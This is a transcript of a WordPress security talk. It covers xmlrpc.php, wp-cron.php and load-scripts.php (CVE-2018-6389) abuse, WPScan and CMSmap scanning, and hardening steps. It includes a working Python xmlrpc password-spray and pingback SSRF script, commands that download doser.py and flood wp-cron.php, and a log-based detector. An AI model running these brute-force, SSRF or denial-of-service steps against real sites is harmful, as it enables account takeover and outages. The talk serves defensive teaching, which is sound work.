
Wordpress Security

Tuhin Bose
December 03, 2021

Transcript

  1. AGENDA
    What is WordPress?
    Why WordPress?
    Hacking WordPress
    Security Measures
    Conclusion & QNA
  2. What is WordPress?
    A free and open source CMS used to create a beautiful website.
    Written in PHP and paired with a MySQL or MariaDB database.
    Simple and flexible, with built-in user management, and easy to set up and upgrade.
  3. Why WordPress?
    As of 2021 there are about 1.3 billion websites on the web. Why attackers care about WordPress:
    1. More than 455 million of those sites run WordPress, so one technique reaches a huge install base.
    2. A huge number of third-party themes and plugins, each of which adds code of varying quality to the site.
    3. Lack of awareness among site owners.
    4. Insecure defaults out of the box (for example xmlrpc.php and wp-cron.php are enabled on every install).
  4. Default Credentials and User Permissions
    Default credentials on the Administrator account are the first thing to try. WordPress roles, from most to least privileged:
    1. Administrator: full control of the site, including themes, plugins and users.
    2. Editor: publishes and manages their own and other users' posts.
    3. Author: publishes and manages their own posts.
    4. Contributor: writes and manages their own posts but cannot publish them.
    5. Subscriber: can only browse posts and edit their own profile.
  5. xmlrpc.php
    Location: /xmlrpc.php
    XML-RPC is a WordPress feature that lets data be exchanged remotely, with HTTP as the transport and XML as the encoding. Say you want to post to your website from your mobile device: the remote access enabled by xmlrpc.php is what makes that possible. The same endpoint is reachable without authentication and answers many method calls in a single request, so we'll try to achieve SSRF (the server fetching a URL we choose) and brute force (many password guesses per request, outside the lockouts that protect wp-login.php).
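The two xmlrpc.php abuses the slide names, as an added example (not code from the original deck): a password spray packed into one system.multicall request of wp.getUsersBlogs calls, a pingback.ping body for the SSRF probe, and the parsing that tells valid guesses apart from faults. The target URL, the username "admin", the password list and SAMPLE_RESPONSE are all constructed for the demo; only the standard library is used.

```python
"""Added example (not the deck's own code): xmlrpc.php password spray via
system.multicall and an SSRF probe via pingback.ping.  Target URL, username,
passwords and the response below are constructed/assumed."""
import urllib.request
import xmlrpc.client

XMLRPC_URL = "https://target.com/xmlrpc.php"  # assumed target, as in the deck


def build_multicall_spray(username, passwords):
    """One POST body carrying one wp.getUsersBlogs login attempt per password.

    wp.getUsersBlogs needs nothing but credentials, so every sub-call is a
    password check and the server answers all of them in a single response.
    Caveat: current WordPress core flags the first failed login in a request
    and rejects the remaining sub-calls, so on an up-to-date site you get one
    real guess per request; the endpoint still bypasses wp-login.php lockouts.
    """
    calls = [
        {"methodName": "wp.getUsersBlogs", "params": [username, pw]}
        for pw in passwords
    ]
    return xmlrpc.client.dumps((calls,), methodname="system.multicall")


def parse_multicall_spray(response_xml, passwords):
    """Return the passwords whose sub-call did not come back as a fault.

    A failed sub-call is a struct with faultCode/faultString; a successful
    one is a one-element array holding the method's result (the blog list).
    """
    (results,), _ = xmlrpc.client.loads(response_xml)
    valid = []
    for pw, outcome in zip(passwords, results):
        failed = isinstance(outcome, dict) and "faultCode" in outcome
        if not failed:
            valid.append(pw)
    return valid


def build_pingback_ssrf(source_url, post_url):
    """pingback.ping(sourceURI, targetURI): the WordPress server fetches sourceURI.

    Pointing sourceURI at an internal host or port makes the site an SSRF
    proxy; targetURI must be a pingback-enabled post on the same site.
    """
    return xmlrpc.client.dumps((source_url, post_url), methodname="pingback.ping")


def send(body, url=XMLRPC_URL):
    """POST an XML-RPC body to the target (network call, not used offline)."""
    req = urllib.request.Request(url, data=body.encode(), headers={"Content-Type": "text/xml"})
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read().decode()


PASSWORDS = ["password", "Winter2021!", "admin123"]  # constructed guess list

# Constructed response for the three guesses above: guesses 1 and 3 fail with a
# 403 fault, guess 2 succeeds and returns the user's blog list (old-core behaviour,
# where every sub-call is checked).
SAMPLE_RESPONSE = """<?xml version="1.0"?>
<methodResponse><params><param><value><array><data>
<value><struct>
<member><name>faultCode</name><value><int>403</int></value></member>
<member><name>faultString</name><value><string>Incorrect username or password.</string></value></member>
</struct></value>
<value><array><data>
<value><array><data><value><struct>
<member><name>isAdmin</name><value><boolean>1</boolean></value></member>
<member><name>url</name><value><string>https://target.com/</string></value></member>
<member><name>blogid</name><value><string>1</string></value></member>
<member><name>blogName</name><value><string>Target</string></value></member>
<member><name>xmlrpc</name><value><string>https://target.com/xmlrpc.php</string></value></member>
</struct></value></data></array></value>
</data></array></value>
<value><struct>
<member><name>faultCode</name><value><int>403</int></value></member>
<member><name>faultString</name><value><string>Incorrect username or password.</string></value></member>
</struct></value>
</data></array></value></param></params></methodResponse>"""


if __name__ == "__main__":
    print(build_multicall_spray("admin", PASSWORDS))
    print("valid:", parse_multicall_spray(SAMPLE_RESPONSE, PASSWORDS))
    # 10.0.0.5:8080 stands in for an internal service the site can reach.
    print(build_pingback_ssrf("http://10.0.0.5:8080/", "https://target.com/?p=1"))
```

Against a live target you would pass the body from build_multicall_spray to send() and feed the reply to parse_multicall_spray; for the SSRF probe, the fault string and response time of pingback.ping are what leak whether the internal URL was reachable. Only do either against systems you are authorized to test.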
  6. Denial of Service (DoS): /wp-cron.php
    Every request to this file bootstraps WordPress, reads the scheduled-event list from the database and runs any tasks that are due, so each hit is expensive and an attacker can hammer it to cause a DoS. By default WordPress triggers wp-cron.php on every page load (whenever a client requests any WordPress page), which on high-traffic sites is itself a performance problem.
  7. Denial of Service (DoS): /wp-cron.php
    Detection: requesting /wp-cron.php directly returns a blank page with a 200 OK response.
    Exploitation: open your terminal and run the following commands (doser.py floods the URL with many parallel requests; -t is the thread count, so only do this against a target you are authorized to test):
      i.  wget https://raw.githubusercontent.com/Quitten/doser.py/master/doser.py
      ii. python3 doser.py -t 999 -g 'https://target.com/wp-cron.php'
  9. Denial of Service (DoS): CVE-2018-6389
    WordPress lets a client load multiple JS and CSS files at once through wp-admin/load-scripts.php, without authentication. For example, https://example.com/wp-admin/load-scripts.php?c=1&load%5B%5D=jquery-ui-core,editor&ver=4.9.1 makes load-scripts.php read the jquery-ui-core and editor files and return their contents concatenated. Neither the number nor the size of the requested files is limited, so an attacker can use this endpoint to exhaust server resources and launch a denial of service attack. For example, the payload shown on the slide causes 4.11 MB of data to be transferred between the server and the client per request, so 10,000 requests would move about 41,100 MB (roughly 41 GB) from the server to the attacker and deny service to everyone else. Core never fixed this (the WordPress team considers it a server-level issue), so the mitigation is at the web server (see Security Measures).
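A defender's view of the two unauthenticated DoS vectors above (wp-cron.php hammering and oversized load-scripts.php requests, CVE-2018-6389), as an added example that is not part of the original deck: a small detector run over web-server access-log lines in the combined format. The log lines, client addresses, byte counts and both thresholds are constructed for the demo; the script handles in the attack URL are real WordPress handle names repeated to reach an abusive length.

```python
"""Added example (not the deck's own code): flag clients hammering /wp-cron.php
and load-scripts.php requests carrying an abusive number of script handles.
All log lines, addresses, sizes and thresholds below are constructed."""
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" format: ip ident user [time] "METHOD path proto" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<bytes>\d+|-)'
)

CRON_HITS_THRESHOLD = 20       # direct wp-cron.php hits from one client in the analysed lines
SCRIPT_HANDLES_THRESHOLD = 50  # script handles in a single load[] request


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["bytes"] = 0 if rec["bytes"] == "-" else int(rec["bytes"])
    return rec


def load_scripts_handles(request_path):
    """Script handles requested through wp-admin/load-scripts.php (load[]=a,b,c)."""
    parts = urlsplit(request_path)
    if not parts.path.endswith("/wp-admin/load-scripts.php"):
        return []
    query = parse_qs(parts.query)  # decodes load%5B%5D back to load[]
    handles = []
    for value in query.get("load[]", []) + query.get("load", []):
        handles.extend(h for h in value.split(",") if h)
    return handles


def analyse(lines):
    """Return (kind, client_ip, count, bytes) findings for the given log lines.

    wp-cron.php hits are counted per client over all lines given; a production
    version would window them by the timestamp. WordPress's own cron spawn
    arrives from the server's address, which is easy to allow-list here.
    """
    cron_hits = Counter()
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if urlsplit(rec["path"]).path == "/wp-cron.php":
            cron_hits[rec["ip"]] += 1
        handles = load_scripts_handles(rec["path"])
        if len(handles) > SCRIPT_HANDLES_THRESHOLD:
            findings.append(("load-scripts-flood", rec["ip"], len(handles), rec["bytes"]))
    for ip, hits in cron_hits.items():
        if hits > CRON_HITS_THRESHOLD:
            findings.append(("wp-cron-flood", ip, hits, None))
    return findings


# Real handle names, repeated to build an oversized load[] list like the CVE payload.
HANDLE_LIST = ",".join(
    ["jquery-ui-core", "editor", "jquery-ui-widget", "jquery-ui-mouse",
     "jquery-ui-sortable", "jquery-ui-dialog", "media-views", "thickbox"] * 8
)
ATTACK_URL = "/wp-admin/load-scripts.php?c=1&load%5B%5D=" + HANDLE_LIST + "&ver=4.9.1"


def log_line(ip, path, status=200, size=0, second=0):
    """Build one constructed combined-format line."""
    return (f'{ip} - - [03/Dec/2021:10:00:{second:02d} +0000] '
            f'"GET {path} HTTP/1.1" {status} {size} "-" "python-requests/2.26.0"')


# Constructed sample: 25 wp-cron hits from one client, normal traffic from
# another, and a single oversized load-scripts.php request from a third.
SAMPLE_LOG = (
    [log_line("203.0.113.7", "/wp-cron.php", second=i % 60) for i in range(25)]
    + [log_line("198.51.100.5", "/?p=1", size=15320),
       log_line("198.51.100.5", "/wp-cron.php?doing_wp_cron=1638525600.123", second=3),
       log_line("203.0.113.9", ATTACK_URL, size=4310000, second=5)]
)


if __name__ == "__main__":
    for finding in analyse(SAMPLE_LOG):
        print(finding)
```

Run it as-is to see the two findings; in practice you would feed it the tail of the real access log (or wire the same two checks into a WAF or fail2ban rule) and tune the thresholds to the site's normal traffic.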
  10. Automation: WPScan / CMSmap
    CMSmap: CMSmap is an open source Python CMS scanner that automates the detection of security flaws in the most popular CMSs. Its main purpose is to integrate common vulnerability checks for different CMSs into a single tool.
      cmsmap https://example.com
  11. Automation: WPScan / CMSmap
    WPScan: WPScan is a WordPress security scanner written for security professionals and blog maintainers to test the security of their WordPress websites.
  12. Automation: WPScan commands
    Basic scan:               wpscan --url https://target.com/
    Enumerate all themes:     wpscan --url https://target.com/ -e at
    Enumerate all plugins:    wpscan --url https://target.com/ -e ap
    Vulnerable themes only:   wpscan --url https://target.com/ -e vt --api-token <API>
    Vulnerable plugins only:  wpscan --url https://target.com/ -e vp --api-token <API>
    The vt and vp modes match what is found against WPScan's vulnerability database, which is why they need an API token; without one you still get the enumeration, just not the vulnerability data.
  13. Security Measures
    1. Disable xmlrpc.php manually or with a plugin; if nothing needs remote publishing it is only an attack surface.
    2. Disable WordPress's built-in cron trigger in wp-config.php:
         define('DISABLE_WP_CRON', true);
       and run wp-cron.php from a regular system cronjob instead. This constant only stops page loads from spawning wp-cron.php; a direct request to /wp-cron.php still executes it, so also restrict that file at the web server to the host that runs the cronjob.
    3. Protect against CVE-2018-6389 by denying access to load-scripts.php in .htaccess:
         <Files load-scripts.php>
         Order allow,deny
         Deny from all
         </Files>
       (On Apache 2.4 the equivalent is Require all denied.) The admin dashboard itself uses load-scripts.php to bundle its JavaScript, so denying it for everyone breaks wp-admin unless script concatenation is turned off via the CONCATENATE_SCRIPTS constant in wp-config.php; allowing only trusted addresses is the safer option.
    4. Update the WordPress core, themes and plugins regularly.
    5. Hide the default login page (/wp-login.php) or allow it only from a few trusted IP addresses.
    6. Use reCAPTCHA on sensitive actions (login, registration, password reset, comments).
    7. Always keep a backup of your site.
    8. Use strong passwords and enable 2FA on every account.